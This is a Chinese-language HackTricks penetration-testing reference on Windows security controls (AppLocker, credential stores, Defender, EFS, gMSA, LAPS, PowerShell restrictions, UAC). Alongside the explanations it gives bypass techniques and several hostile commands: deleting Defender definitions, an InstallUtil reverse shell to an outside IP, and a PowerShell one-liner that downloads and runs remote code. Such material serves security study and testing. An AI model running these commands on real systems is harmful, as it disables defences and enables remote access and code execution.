hacktricks/windows-hardening/authentication-credentials-uac-and-efs.md

17 KiB
Raw Blame History

Windows安全控制

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式

使用Trickest可以轻松构建和自动化工作流程,并由全球最先进的社区工具提供支持。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

AppLocker策略

应用程序白名单是一份批准的软件应用程序或可执行文件列表,允许其存在和在系统上运行。其目标是保护环境免受有害恶意软件和与组织特定业务需求不符的未经批准软件的侵害。

AppLocker是微软的应用程序白名单解决方案,让系统管理员控制用户可以运行哪些应用程序和文件。它提供对可执行文件、脚本、Windows安装程序文件、DLL、打包应用和打包应用安装程序的细粒度控制
组织通常会阻止cmd.exe和PowerShell.exe以及对某些目录的写访问,但这些都可以被绕过

检查

检查哪些文件/扩展名被列入黑名单/白名单:

Get-ApplockerPolicy -Effective -xml

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

$a = Get-ApplockerPolicy -effective
$a.rulecollections

这个注册表路径包含了AppLocker应用的配置和策略提供了一种查看系统上当前生效规则集的方式

  • HKLM\Software\Policies\Microsoft\Windows\SrpV2

绕过

  • 用于绕过AppLocker策略的有用可写文件夹如果AppLocker允许在C:\Windows\System32C:\Windows中执行任何内容,那么有可写文件夹可用于绕过此限制
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
  • 通常受信任的"LOLBAS's"二进制文件也可以用于绕过AppLocker。
  • 编写不良的规则也可能被绕过
  • 例如,<FilePathCondition Path="%OSDRIVE%*\allowed*"/>**,您可以在任何地方创建一个名为allowed`的文件夹**,它将被允许。
  • 组织通常也会专注于阻止%System32%\WindowsPowerShell\v1.0\powershell.exe可执行文件,但忽略了其他PowerShell可执行文件位置 ,如%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell_ISE.exe
  • DLL强制执行很少启用,因为它可能会给系统带来额外的负担,并且需要大量测试来确保不会出现问题。因此,使用DLL作为后门将有助于绕过AppLocker
  • 您可以使用ReflectivePickSharpPick在任何进程中执行Powershell代码并绕过AppLocker。有关更多信息请查看https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode

凭据存储

安全帐户管理器SAM

本地凭据存在于此文件中,密码已经被哈希。

本地安全机构LSA- LSASS

凭据(哈希)被保存在此子系统的内存中,用于单点登录。
LSA管理本地安全策略(密码策略,用户权限...身份验证访问令牌...
LSA将会检查提供的凭据是否在SAM文件中(用于本地登录),并与域控制器通信以验证域用户。

凭据保存LSASS进程Kerberos票据NT和LM哈希易于解密的密码。

LSA秘密

LSA可能会在磁盘中保存一些凭据

  • Active Directory计算机帐户的密码无法访问的域控制器
  • Windows服务帐户的密码
  • 计划任务的密码
  • 更多IIS应用程序的密码...

NTDS.dit

这是Active Directory的数据库。仅存在于域控制器中。

Defender

Microsoft Defender是Windows 10和Windows 11中可用的防病毒软件也适用于Windows Server的某些版本。它阻止常见的渗透测试工具,如**WinPEAS。但是,有方法可以绕过这些保护**。

检查

要检查Defender状态您可以执行PS cmdlet Get-MpComputerStatus(检查**RealTimeProtectionEnabled**的值以了解是否已激活):

PS C:\> Get-MpComputerStatus

[...]
AntispywareEnabled              : True
AntispywareSignatureAge         : 1
AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
AntispywareSignatureVersion     : 1.323.392.0
AntivirusEnabled                : True
[...]
NISEnabled                      : False
NISEngineVersion                : 0.0.0.0
[...]
RealTimeProtectionEnabled       : True
RealTimeScanDirection           : 0
PSComputerName                  :

您还可以运行以下内容进行枚举:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
sc query windefend

#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

加密文件系统EFS

EFS通过加密来保护文件利用称为文件加密密钥FEK对称密钥。该密钥使用用户的公钥加密,并存储在加密文件的$EFS 备用数据流中。需要解密时,用户的数字证书对应的私钥用于从$EFS流中解密FEK。更多详细信息可在此处找到。

无需用户启动的解密场景包括:

  • 当文件或文件夹移动到非EFS文件系统FAT32)时,它们会自动解密。
  • 通过SMB/CIFS协议发送的加密文件在传输之前会被解密。

这种加密方法允许所有者透明访问加密文件。然而,仅仅更改所有者的密码并登录将不允许解密。

要点

  • EFS使用对称FEK使用用户的公钥加密。
  • 解密使用用户的私钥访问FEK。
  • 在特定条件下会自动解密如复制到FAT32或网络传输。
  • 所有者可以访问加密文件而无需额外步骤。

检查EFS信息

检查用户是否使用了此服务,检查路径是否存在:C:\users\<username>\appdata\roaming\Microsoft\Protect

使用cipher /c \<file>检查文件的访问权限。您还可以在文件夹中使用cipher /ecipher /d加密解密所有文件。

解密EFS文件

成为权限系统

这种方式需要受害用户在主机内运行一个进程。如果是这种情况,可以使用meterpreter会话来模拟用户进程的令牌(从incognito中的impersonate_token)。或者您可以直接migrate到用户的进程。

知道用户的密码

{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}

群组管理服务帐户gMSA

微软开发了群组管理服务帐户gMSA以简化IT基础设施中服务帐户的管理。与通常启用“密码永不过期”设置的传统服务帐户不同gMSA提供了更安全和可管理的解决方案

  • 自动密码管理gMSA使用一个复杂的、240字符的密码根据域或计算机策略自动更改。这个过程由微软的密钥分发服务KDC处理消除了手动密码更新的需要。
  • 增强安全性:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
  • 多主机支持gMSA可以在多个主机之间共享非常适合在多台服务器上运行的服务。
  • 定时任务功能与托管服务帐户不同gMSA支持运行定时任务。
  • 简化的SPN管理当计算机的sAMaccount详细信息或DNS名称发生变化时系统会自动更新服务主体名称SPN简化了SPN管理。

gMSA的密码存储在LDAP属性_msDS-ManagedPassword_中并且每30天由域控制器DCs自动重置。这个密码是一个加密的数据块称为MSDS-MANAGEDPASSWORD_BLOB只能由授权管理员和安装了gMSA的服务器检索确保了一个安全的环境。要访问这些信息需要一个安全连接如LDAPS或者连接必须经过“密封和安全”认证。

https://cube0x0.github.io/Relaying-for-gMSA/

您可以使用GMSAPasswordReader来读取这个密码。

/GMSAPasswordReader --AccountName jkohler

在此帖子中查找更多信息

还可以查看这个关于如何执行NTLM中继攻击读取 gMSA 密码网页

LAPS

本地管理员密码解决方案LAPS,可从Microsoft下载,可管理本地管理员密码。这些密码是随机的、独特的,并且定期更改存储在Active Directory中。通过ACL对授权用户进行限制访问这些密码。在授予足够权限的情况下可以读取本地管理员密码。

{% content-ref url="active-directory-methodology/laps.md" %} laps.md {% endcontent-ref %}

PS 受限语言模式

PowerShell 受限语言模式 限制了许多有效使用PowerShell所需的功能如阻止COM对象仅允许批准的.NET类型基于XAML的工作流程PowerShell类等。

检查

$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage

绕过

#Easy bypass
Powershell -version 2

在当前的Windows中绕过Bypass不起作用但你可以使用PSByPassCLM
要编译它,您可能需要 添加引用 -> 浏览 ->浏览 -> 添加 C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll将项目更改为 .Net4.5

直接绕过:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe

反向 shell:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe

您可以使用ReflectivePickSharpPick来在任何进程中执行Powershell代码并绕过受限模式。欲了解更多信息请查看https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode

PS执行策略

默认情况下设置为restricted。绕过此策略的主要方法:

 Just copy and paste inside the interactive PS console
 Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
 Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
 Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
 Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
 Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
 Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
 Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
 Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

更多内容请查看这里

安全支持提供程序接口SSPI

是用于验证用户的API。

SSPI将负责找到两台想要通信的机器的适当协议。首选方法是Kerberos。然后SSPI将协商将使用哪种验证协议这些验证协议称为安全支持提供程序SSP以DLL的形式位于每台Windows机器中两台机器必须支持相同的协议才能通信。

主要SSP

  • Kerberos:首选
  • %windir%\Windows\System32\kerberos.dll
  • NTLMv1NTLMv2:兼容性原因
  • %windir%\Windows\System32\msv1_0.dll
  • DigestWeb服务器和LDAP密码以MD5哈希的形式
  • %windir%\Windows\System32\Wdigest.dll
  • SchannelSSL和TLS
  • %windir%\Windows\System32\Schannel.dll
  • Negotiate用于协商要使用的协议Kerberos或NTLMKerberos是默认值
  • %windir%\Windows\System32\lsasrv.dll

协商可能提供多种方法或仅一种。

UAC - 用户账户控制

用户账户控制UAC是一项功能,可为提升的活动启用同意提示

{% content-ref url="windows-security-controls/uac-user-account-control.md" %} uac-user-account-control.md {% endcontent-ref %}


使用Trickest轻松构建和自动化工作流程,由全球最先进的社区工具驱动。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}


从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式